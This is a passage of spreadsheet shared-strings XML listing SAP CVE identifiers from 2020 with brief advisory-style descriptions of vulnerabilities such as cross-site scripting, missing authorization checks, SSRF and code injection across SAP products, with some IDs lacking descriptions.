    <t>Under certain conditions, SAP Adaptive Server Enterprise (Web Services), versions 15.7, 16.0, allows an authenticated user to execute crafted database queries to elevate their privileges, modify database objects, or execute commands they are not otherwise authorized to execute, leading to SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-6254</t>
  </si>
  <si>
    <t>SAP Enterprise Threat Detection, versions 1.0, 2.0, does not sufficiently encode error response pages in case of errors, allowing XSS payload reflecting in the response, leading to reflected Cross Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6256</t>
  </si>
  <si>
    <t>SAP Master Data Governance, versions - 748, 749, 750, 751, 752, 800, 801, 802, 803, 804, allows users to display change request details without having required authorizations, due to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6257</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (CMC and BI Launchpad) 4.2 does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6258</t>
  </si>
  <si>
    <t>SAP Identity Management, version 8.0, does not perform necessary authorization checks for an authenticated user, allowing the attacker to view certain sensitive information of the victim, leading to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6259</t>
  </si>
  <si>
    <t>Under certain conditions SAP Adaptive Server Enterprise, versions 15.7, 16.0, allows an attacker to access information which would otherwise be restricted leading to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6260</t>
  </si>
  <si>
    <t>SAP Solution Manager (Trace Analysis), version 7.20, allows an attacker to inject superflous data that can be displayed by the application, due to Incomplete XML Validation. The application shows additional data that do not actually exist.</t>
  </si>
  <si>
    <t>CVE-2020-6261</t>
  </si>
  <si>
    <t>SAP Solution Manager (Trace Analysis), version 7.20, allows an attacker to perform a log injection into the trace file, due to Incomplete XML Validation. The readability of the trace file is impaired.</t>
  </si>
  <si>
    <t>CVE-2020-6262</t>
  </si>
  <si>
    <t>Service Data Download in SAP Application Server ABAP (ST-PI, before versions 2008_1_46C, 2008_1_620, 2008_1_640, 2008_1_700, 2008_1_710, 740) allows an attacker to inject code that can be executed by the application. An attacker could thereby control the behavior of the application and the whole ABAP system leading to Code Injection.</t>
  </si>
  <si>
    <t>CVE-2020-6263</t>
  </si>
  <si>
    <t>Standalone clients connecting to SAP NetWeaver AS Java via P4 Protocol, versions (SAP-JEECOR 7.00, 7.01; SERVERCOR 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; CORE-TOOLS 7.00, 7.01, 7.02, 7.05, 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50) do not perform any authentication checks for operations that require user identity leading to Authentication Bypass.</t>
  </si>
  <si>
    <t>CVE-2020-6264</t>
  </si>
  <si>
    <t>SAP Commerce, versions - 6.7, 1808, 1811, 1905, may allow an attacker to access information under certain conditions which would otherwise be restricted, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6265</t>
  </si>
  <si>
    <t>SAP Commerce, versions - 6.7, 1808, 1811, 1905, and SAP Commerce (Data Hub), versions - 6.7, 1808, 1811, 1905, allows an attacker to bypass the authentication and/or authorization that has been configured by the system administrator due to the use of Hardcoded Credentials.</t>
  </si>
  <si>
    <t>CVE-2020-6266</t>
  </si>
  <si>
    <t>SAP Fiori for SAP S/4HANA, versions - 100, 200, 300, 400, allows an attacker to redirect users to a malicious site due to insufficient URL validation, leading to URL Redirection.</t>
  </si>
  <si>
    <t>CVE-2020-6267</t>
  </si>
  <si>
    <t>Some sensitive cookies in SAP Disclosure Management, version 10.1, are missing HttpOnly flag, leading to sensitive cookie without Http Only flag.</t>
  </si>
  <si>
    <t>CVE-2020-6268</t>
  </si>
  <si>
    <t>Statutory Reporting for Insurance Companies in SAP ERP (EA-FINSERV versions - 600, 603, 604, 605, 606, 616, 617, 618, 800 and S4CORE versions 101, 102, 103, 104) does not execute the required authorization checks for an authenticated user, allowing an attacker to view and tamper with certain restricted data leading to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6269</t>
  </si>
  <si>
    <t>Under certain conditions SAP Business Objects Business Intelligence Platform, version 4.2, allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6270</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP (Banking Services), versions - 710, 711, 740, 750, 751, 752, 75A, 75B, 75C, 75D, 75E, does not perform necessary authorization checks for an authenticated user due to Missing Authorization Check, allowing wrong and unexpected change of individual conditions by a malicious user leading to wrong prices.</t>
  </si>
  <si>
    <t>CVE-2020-6271</t>
  </si>
  <si>
    <t>SAP Solution Manager (Problem Context Manager), version 7.2, does not perform the necessary authentication, allowing an attacker to consume large amounts of memory, causing the system to crash and read restricted data (files visible for technical administration users of the diagnostics agent).</t>
  </si>
  <si>
    <t>CVE-2020-6272</t>
  </si>
  <si>
    <t>SAP Commerce Cloud versions - 1808, 1811, 1905, 2005, does not sufficiently encode user inputs, which allows an authenticated and authorized content manager to inject malicious script into several web CMS components. These can be saved and later triggered, if an affected web page is visited, resulting in Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6273</t>
  </si>
  <si>
    <t>SAP S/4 HANA (Fiori UI for General Ledger Accounting), versions 103, 104, does not perform necessary authorization checks for an authenticated user working with attachment service, allowing the attacker to delete attachments due to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6275</t>
  </si>
  <si>
    <t>SAP Netweaver AS ABAP, versions 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, are vulnerable for Server Side Request Forgery Attack where in an attacker can use inappropriate path names containing malicious server names in the import/export of sessions functionality and coerce the web server into authenticating with the malicious server. Furthermore, if NTLM is setup the attacker can compromise confidentiality, integrity and availability of the SAP database.</t>
  </si>
  <si>
    <t>CVE-2020-6276</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (bipodata), version 4.2, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6278</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (BI Launchpad and CMC), versions 4.1, 4.2, allows to an attacker to embed malicious scripts in the application while uploading images, which gets executed when the victim opens these files, leading to Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-6280</t>
  </si>
  <si>
    <t>SAP NetWeaver (ABAP Server) and ABAP Platform, versions 731, 740, 750, allows an attacker with admin privileges to access certain files which should otherwise be restricted, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6281</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (BI Launchpad), version 4.2, does not sufficiently encode user-controlled inputs, resulting reflected in Cross-Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6282</t>
  </si>
  <si>
    <t>SAP NetWeaver AS JAVA (IIOP service) (SERVERCORE), versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, and SAP NetWeaver AS JAVA (IIOP service) (CORE-TOOLS), versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, allows an attacker to send a crafted request from a vulnerable web application. It is usually used to target internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a Server-Side Request Forgery vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6283</t>
  </si>
  <si>
    <t>SAP Fiori Launchpad does not sufficiently encode user controlled inputs, and hence allowing the attacker to inject the meta tag into the launchpad html using the vulnerable parameter, resulting in reflected Cross-Site Scripting (XSS) vulnerability. With a successful attack, the attacker can steal authentication information of the user, such as data relating to his or her current session.</t>
  </si>
  <si>
    <t>CVE-2020-6284</t>
  </si>
  <si>
    <t>SAP NetWeaver (Knowledge Management), versions - 7.30, 7.31, 7.40, 7.50, allows the automatic execution of script content in a stored file due to inadequate filtering with the accessing user's privileges. If the accessing user has administrative privileges, then the execution of the script content could result in complete compromise of system confidentiality, integrity and availability, leading to Stored Cross Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6285</t>
  </si>
  <si>
    <t>SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI) (versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50), under certain conditions allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6286</t>
  </si>
  <si>
    <t>The insufficient input path validation of certain parameter in the web service of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, allows an unauthenticated attacker to exploit a method to download zip files to a specific directory, leading to Path Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-6287</t>
  </si>
  <si>
    <t>SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check.</t>
  </si>
  <si>
    <t>CVE-2020-6288</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (Web Intelligence HTML interface) allows an attacker with edit document rights to upload any file (including script files) without proper file format validation leading to Unrestricted upload of file with dangerous type vulnerability. The attacker can modify some formulas and display erroneous content. The server is not affected only the current user browser session, that can easily be closed.</t>
  </si>
  <si>
    <t>CVE-2020-6289</t>
  </si>
  <si>
    <t>SAP Disclosure Management, version 10.1, had insufficient protection against Cross-Site Request Forgery, which could be used to trick user in to browsing malicious site.</t>
  </si>
  <si>
    <t>CVE-2020-6290</t>
  </si>
  <si>
    <t>SAP Disclosure Management, version 10.1, is vulnerable to Session Fixation attacks wherein the attacker tricks the user into using a specific session ID.</t>
  </si>
  <si>
    <t>CVE-2020-6291</t>
  </si>
  <si>
    <t>SAP Disclosure Management, version 10.1, session mechanism does not have expiration data set therefore allows unlimited access after authenticating once, leading to Insufficient Session Expiration</t>
  </si>
  <si>
    <t>CVE-2020-6292</t>
  </si>
  <si>
    <t>Logout mechanism in SAP Disclosure Management, version 10.1, does not invalidate one of the session cookies, leading to Insufficient Session Expiration.</t>
  </si>
  <si>
    <t>CVE-2020-6293</t>
  </si>
  <si>
    <t>SAP NetWeaver (Knowledge Management), versions - 7.30, 7.31, 7.40, 7.50, allows an unauthenticated attacker to upload a malicious file and also to access, modify or make unavailable existing files but the impact is limited to the files themselves and is restricted by other policies such as access control lists and other upload file size restrictions, leading to Unrestricted File Upload.</t>
  </si>
  <si>
    <t>CVE-2020-6294</t>
  </si>
  <si>
    <t>Xvfb of SAP Business Objects Business Intelligence Platform, versions - 4.2, 4.3, platform on Unix does not perform any authentication checks for functionalities that require user identity.</t>
  </si>
  <si>
    <t>CVE-2020-6295</t>
  </si>
  <si>
    <t>Under certain conditions the SAP Adaptive Server Enterprise, version 16.0, allows an attacker to access encrypted sensitive and confidential information through publicly readable installation log files leading to a compromise of the installed Cockpit. This compromise could enable the attacker to view, modify and/or make unavailable any data associated with the Cockpit, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6296</t>
  </si>
  <si>
    <t>SAP NetWeaver (ABAP Server) and ABAP Platform, versions - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 753, 755, allows an attacker to inject code that can be executed by the application, leading to Code Injection. An attacker could thereby control the behavior of the application.</t>
  </si>
  <si>
    <t>CVE-2020-6297</t>
  </si>
  <si>
    <t>Under certain conditions the upgrade of SAP Data Hub 2.7 to SAP Data Intelligence, version - 3.0, allows an attacker to access confidential system configuration information, that should otherwise be restricted, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6298</t>
  </si>
  <si>
    <t>SAP Banking Services (Generic Market Data), versions - 400, 450, 500, allows an unauthorized user to display protected Business Partner Generic Market Data (GMD) and change related GMD key figure values, due to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6299</t>
  </si>
  <si>
    <t>SAP NetWeaver (ABAP Server) and ABAP Platform, versions - 740, 750, 751, 752, 753, 754, 755, allows a business user to access the list of users in the given system using value help, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6300</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (Central Management Console), versions- 4.2, 4.3, allows an attacker with administrator rights can use the web application to send malicious code to a different end user (victim), as it does not sufficiently encode user-controlled inputs for RecycleBin, resulting in Stored Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6301</t>
  </si>
  <si>
    <t>SAP ERP (HCM Travel Management), versions - 600, 602, 603, 604, 605, 606, 607, 608, allows an authenticated but unauthorized attacker to read, modify and settle trips, resulting in escalation of privileges, due to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6302</t>
  </si>
  <si>
    <t>SAP Commerce versions 6.7, 1808, 1811, 1905, 2005 contains the jSession ID in the backoffice URL when the application is loaded initially. An attacker can get this session ID via shoulder surfing or man in the middle attack and subsequently get access to admin user accounts, leading to Session Fixation and complete compromise of the confidentiality, integrity and availability of the application.</t>
  </si>
  <si>
    <t>CVE-2020-6303</t>
  </si>
  <si>
    <t>SAP Disclosure Management, before version 10.1, does not validate user input properly in specific use cases leading to Cross-Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6304</t>
  </si>
  <si>
    <t>Improper input validation in SAP NetWeaver Internet Communication Manager (update provided in KRNL32NUC &amp; KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT KRNL64NUC &amp; KRNL64UC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49 KERNEL 7.21, 7.49, 7.53) allows an attacker to prevent users from accessing its services through a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-6305</t>
  </si>
  <si>
    <t>PI Rest Adapter of SAP Process Integration (update provided in SAP_XIAF 7.31, 7.40, 7.50) does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6306</t>
  </si>
  <si>
    <t>Missing authorization check in a transaction within SAP Leasing (update provided in SAP_APPL 6.18, EA-APPL 6.0, 6.02, 6.03, 6.04, 6.05, 6.06, 6.16 and 6.17).</t>
  </si>
  <si>
    <t>CVE-2020-6307</t>
  </si>
  <si>
    <t>Automated Note Search Tool (update provided in SAP Basis 7.0, 7.01, 7.02, 7.31, 7.4, 7.5, 7.51, 7.52, 7.53 and 7.54) does not perform sufficient authorization checks leading to the reading of sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-6308</t>
  </si>
  <si>
    <t>SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6309</t>
  </si>
  <si>
    <t>SAP NetWeaver AS JAVA, versions - (ENGINEAPI 7.10; WSRM 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; J2EE-FRMW 7.10, 7.11), does not perform any authentication checks for a web service allowing the attacker to send several payloads and leading to complete denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-6310</t>
  </si>
  <si>
    <t>Improper access control in SOA Configuration Trace component in SAP NetWeaver (ABAP Server) and ABAP Platform, versions - 702, 730, 731, 740, 750, allows any authenticated user to enumerate all SAP users, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6311</t>
  </si>
  <si>
    <t>Banking services from SAP 9.0 (Bank Analyzer), version - 500, and SAP S/4HANA for financial products subledger, version ? 100, does not correctly perform necessary authorization checks for an authenticated user due to Improper Authorization checks, that may cause a system administrator to create incorrect authorization proposals. This may result in privilege escalation and may expose restricted banking data.</t>
  </si>
  <si>
    <t>CVE-2020-6312</t>
  </si>
  <si>
    <t>SAP BusinessObjects Business Intelligence Platform (Web Intelligence HTML interface), versions - 4.1, 4.2, allows an attacker with a non-administrative user account that can edit certain web page properties, can modify how a browser processes particular page elements, leading to stored Cross Site Scripting. In certain situations, when a user accesses an affected web page element, the attacker will be able to access or modify metadata for which they are not authorized.</t>
  </si>
  <si>
    <t>CVE-2020-6313</t>
  </si>
  <si>
    <t>SAP NetWeaver Application Server JAVA(XML Forms) versions 7.30, 7.31, 7.40, 7.50 does not sufficiently encode user controlled inputs, which allows an authenticated User with special roles to store malicious content, that when accessed by a victim, can perform malicious actions by executing JavaScript, leading to Stored Cross-Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6314</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated HPGL file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6315</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version 9, allows an attacker to send certain manipulated file to the victim, which can lead to leakage of sensitive information when the victim loads the malicious file into the VE viewer, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6316</t>
  </si>
  <si>
    <t>SAP ERP and SAP S/4 HANA allows an authenticated user to see cost records to objects to which he has no authorization in PS reporting, leading to Missing Authorization check.</t>
  </si>
  <si>
    <t>CVE-2020-6317</t>
  </si>
  <si>
    <t>In certain situations, an attacker with regular user credentials and local access to an ASE cockpit installation can access sensitive information which appears in the installation log files. This information although sensitive is of limited utility and cannot be used to further access, modify or render unavailable any other information in the cockpit or system. This affects SAP Adaptive Server Enterprise, Versions - 15.7, 16.0.</t>
  </si>
  <si>
    <t>CVE-2020-6318</t>
  </si>
  <si>
    <t>A Remote Code Execution vulnerability exists in the SAP NetWeaver (ABAP Server, up to release 7.40) and ABAP Platform (&gt; release 7.40).Because of this, an attacker can exploit these products via Code Injection, and potentially enabling to take complete control of the products, including viewing, changing, or deleting data by injecting code into the working memory which is subsequently executed by the application. It can also be used to cause a general fault in the product, causing the products to terminate.</t>
  </si>
  <si>
    <t>CVE-2020-6319</t>
  </si>
  <si>
    <t>SAP NetWeaver Application Server Java, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, and 7.50 allows an unauthenticated attacker to include JavaScript blocks in any web page or URL with different symbols which are otherwise not allowed. On successful exploitation an attacker can steal authentication information of the user, such as data relating to his or her current session and limitedly impact confidentiality and integrity of the application, leading to Reflected Cross Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6320</t>
  </si>
  <si>
    <t>SAP Marketing (Servlet), version-130,140,150, allows an authenticated attacker to invoke certain functions that are restricted. Limited knowledge of payload is required for an attacker to exploit the vulnerability and perform tasks related to contact and interaction data which impacts Confidentiality and Integrity of data in the application.</t>
  </si>
  <si>
    <t>CVE-2020-6321</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated U3D file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6322</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated 3DM file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6323</t>
  </si>
  <si>
    <t>SAP NetWeaver Enterprise Portal (Fiori Framework Page) versions - 7.50, 7.31, 7.40, does not sufficiently encode user-controlled inputs and allows an attacker on a valid session to create an XSS that will be both reflected immediately and also be persisted and returned in further access to the system, resulting in Cross Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6324</t>
  </si>
  <si>
    <t>SAP Netweaver AS ABAP(BSP Test Application sbspext_table), version-700,701,720,730,731,740,750,751,752,753,754,755, allows an unauthenticated attacker to send polluted URL to the victim, when the victim clicks on this URL, the attacker can read, modify the information available in the victim?s browser leading to Reflected Cross Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6326</t>
  </si>
  <si>
    <t>SAP NetWeaver (Knowledge Management), version-7.30,7.31,7.40,7.50, allows an authenticated attacker to create malicious links in the UI, when clicked by victim, will execute arbitrary java scripts thus extracting or modifying information otherwise restricted leading to Stored Cross Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6327</t>
  </si>
  <si>
    <t>CVE-2020-6328</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated CGM file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6329</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated SKP file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6330</t>
  </si>
  <si>
    <t>CVE-2020-6331</t>
  </si>
  <si>
    <t>CVE-2020-6332</t>
  </si>
  <si>
    <t>CVE-2020-6333</t>
  </si>
  <si>
    <t>CVE-2020-6334</t>
  </si>
  <si>
    <t>CVE-2020-6335</t>
  </si>
  <si>
    <t>CVE-2020-6336</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated PCX file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6337</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated HDR file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6338</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated RH file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6339</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated BMP file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6340</t>
  </si>
  <si>
    <t>CVE-2020-6341</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated EPS file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6342</t>
  </si>
  <si>
    <t>CVE-2020-6343</t>
  </si>
  <si>
    <t>CVE-2020-6344</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated PDF file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6345</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated TGA file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6346</t>
  </si>
  <si>
    <t>CVE-2020-6347</t>
  </si>
  <si>
    <t>CVE-2020-6348</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated GIF file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6349</t>
  </si>
  <si>
    <t>CVE-2020-6350</t>
  </si>
  <si>
    <t>CVE-2020-6351</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated FBX file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6352</t>
  </si>
  <si>
    <t>CVE-2020-6353</t>
  </si>
  <si>
    <t>CVE-2020-6354</t>
  </si>
  <si>
    <t>CVE-2020-6355</t>
  </si>
  <si>
    <t>CVE-2020-6356</t>
  </si>
  <si>
    <t>CVE-2020-6357</t>
  </si>
  <si>
    <t>CVE-2020-6358</t>
  </si>
  <si>
    <t>CVE-2020-6359</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated PLT file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6360</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated DIB file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6361</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated RLE files received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6362</t>
  </si>
  <si>
    <t>SAP Banking Services version 500, use an incorrect authorization object in some of its reports. Although the affected reports are protected with otherauthorization objects, exploitation of the vulnerability could lead to privilege escalation and violation in segregation of duties, which in turn could lead to Service interruptions and system unavailability for the victim and users of the component.</t>
  </si>
  <si>
    <t>CVE-2020-6363</t>
  </si>
  <si>
    <t>SAP Commerce Cloud, versions - 1808, 1811, 1905, 2005, exposes several web applications that maintain sessions with a user. These sessions are established after the user has authenticated with username/passphrase credentials. The user can change their own passphrase, but this does not invalidate active sessions that the user may have with SAP Commerce Cloud web applications, which gives an attacker the opportunity to reuse old session credentials, resulting in Insufficient Session Expiration.</t>
  </si>
  <si>
    <t>CVE-2020-6364</t>
  </si>
  <si>
    <t>SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an attacker to modify a cookie in a way that OS commands can be executed and potentially gain control over the host running the CA Introscope Enterprise Manager,leading to Code Injection. With this, the attacker is able to read and modify all system files and also impact system availability.</t>
  </si>
  <si>
    <t>CVE-2020-6365</t>
  </si>
  <si>
    <t>SAP NetWeaver AS Java, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, Start Page allows an unauthenticated remote attacker to redirect users to a malicious site due to insufficient reverse tabnabbing URL validation. The attacker could execute phishing attacks to steal credentials of the victim or to redirect users to untrusted web pages containing malware or similar malicious exploits.</t>
  </si>
  <si>
    <t>CVE-2020-6366</t>
  </si>
  <si>
    <t>SAP NetWeaver (Compare Systems) versions - 7.20, 7.30, 7.40, 7.50, does not sufficiently validate uploaded XML documents. An attacker with administrative privileges can retrieve arbitrary files including files on OS level from the server and/or can execute a denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2020-6367</t>
  </si>
  <si>
    <t>There is a reflected cross site scripting vulnerability in SAP NetWeaver Composite Application Framework, versions - 7.20, 7.30, 7.31, 7.40, 7.50. An unauthenticated attacker can trick an unsuspecting authenticated user to click on a malicious link. The end users browser has no way to know that the script should not be trusted, and will execute the script, resulting in sensitive information being disclosed or modified.</t>
  </si>
  <si>
    <t>CVE-2020-6368</t>
  </si>
  <si>
    <t>SAP Business Planning and Consolidation, versions - 750, 751, 752, 753, 754, 755, 810, 100, 200, can be abused by an attacker, allowing them to modify displayed application content without authorization, and to potentially obtain authentication information from other legitimate users, leading to Cross Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6369</t>
  </si>
  <si>
    <t>SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an unauthenticated attackers to bypass the authentication if the default passwords for Admin and Guest have not been changed by the administrator.This may impact the confidentiality of the service.</t>
  </si>
  <si>
    <t>CVE-2020-6370</t>
  </si>
  <si>
    <t>SAP NetWeaver Design Time Repository (DTR), versions - 7.11, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6371</t>
  </si>
  <si>
    <t>User enumeration vulnerability can be exploited to get a list of user accounts and personal user information can be exposed in SAP NetWeaver Application Server ABAP (POWL test application) versions - 710, 711, 730, 731, 740, 750, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6372</t>
  </si>
  <si>
    <t>CVE-2020-6373</t>
  </si>
  <si>
    <t>CVE-2020-6374</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated Jupiter Tessallation(.jt) file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6375</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated Right Computer Graphics Metafile (.cgm) file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6376</t>
  </si>
  <si>
    <t>SAP 3D Visual Enterprise Viewer, version - 9, allows a user to open manipulated Right Hemisphere Binary (.rh) file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6377</t>
  </si>
  <si>
